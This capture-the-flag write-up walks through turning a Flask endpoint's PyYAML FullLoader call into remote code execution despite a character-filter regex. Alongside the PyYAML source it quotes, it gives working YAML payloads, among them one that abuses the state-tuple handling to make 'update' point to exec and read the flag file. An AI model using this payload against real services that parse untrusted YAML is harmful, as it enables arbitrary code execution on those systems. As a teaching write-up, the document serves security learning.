In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body:
@app.route('/', methods=["POST"])
def pwnme():
if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
return "Nice try!", 400
return yaml.load(request.data)
Before anything else, I first verified that this worked as intended. My template for sending YAML files and receiving the result:
import requests
r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read())
print(r.text) # {"hello":"world","number":9}
PyYAML is well-known for having unsafe deserialization, mainly because they support all sorts of interaction with Python. I'll reference their documentation throughout the writeup.
However, there are two restrictions to keep in mind. First, yaml.load
uses FullLoader
by default, which bans the !!python/object/apply
tag among other things. This means that we won't be able to call arbitrary functions like eval
, although we can still construct class objects with the !!python/object/new
tag.
Second, this challenge uses a regex filter, which bans the following characters:
This prevents us from accessing objects from other modules, which are specified with the <module>.<name>
format. Fortunately, PyYAML will use the builtins
module by default if you don't supply a period. I'm not sure if this is in the documentation, but the source code proves it:
def find_python_name(self, name, mark, unsafe=False):
if not name:
raise ConstructorError("while constructing a Python object", mark,
"expected non-empty name appended to the tag", mark)
if '.' in name:
module_name, object_name = name.rsplit('.', 1)
else:
module_name = 'builtins'
object_name = name
To summarize, we can construct and reference built-in objects. However, we can't call functions, and our goal will be to execute code arbitrarily.
This is the format for specifying class construction, as per the documentation:
!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]
Right away, I was interested in the state
field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since they have read-only attributes. Fortunately, some classes are writeable: Warning
, the Error
types, etc. Hence the following creates an object where obj.hello == 'world'
:
!!python/object/new:Warning
state:
hello: 'world'
Not every attribute can be set, however. PyYAML calls check_state_key
on each key value, which matches against a regex. Keys of the form __something__
are banned, which makes some sense. Interestingly, the key extend
is also banned. PyYAML justifies this in the source code:
extend
is blacklisted because it is used by construct_python_object_apply to addlistitems
to a newly generate python instance
Let's look at the construct_python_object_apply
method for clarification:
if state:
self.set_python_instance_state(instance, state)
if listitems:
instance.extend(listitems)
if dictitems:
for key in dictitems:
instance[key] = dictitems[key]
return instance
Notice that if there were no blacklist, this payload would give RCE:
!!python/object/new:Warning
state:
extend: !!python/name:exec
listitems: 'whatever python code we want'
We first set extend
to be the built-in exec
function, using the !!python/name
tag. Now instance.extend
is a static method, which PyYAML subsequently calls on listitems
- a code string! We've essentially created an object that 'spoofs' a list.
In general, this bug exists whenever code assumes the type of an object we provide. It must then call a method with an argument that we control as well. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally the function which sets state. Here's the source:
def set_python_instance_state(self, instance, state, unsafe=False):
if hasattr(instance, '__setstate__'):
instance.__setstate__(state)
else:
slotstate = {}
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if hasattr(instance, '__dict__'):
if not unsafe and state:
for key in state.keys():
self.check_state_key(key)
instance.__dict__.update(state)
elif state:
slotstate.update(state)
for key, value in slotstate.items():
if not unsafe:
self.check_state_key(key)
setattr(instance, key, value)
Notice that slotstate
is assumed to be a dictionary. Yet if state
is a tuple, the code destructures it into (state, slotstate)
. Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit slotstate.update(state)
.
We want slotstate
to be a dummy object where update
points to exec
. Hence state
should be a tuple containing a code string and dummy object, in that order. One final caveat: in order to reach the elif
block, our outer class instance cannot have the __dict__
attribute - a read-only type like str
works. Here's a payload which prints the flag:
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec
A few more notes:
exec
.getattr
.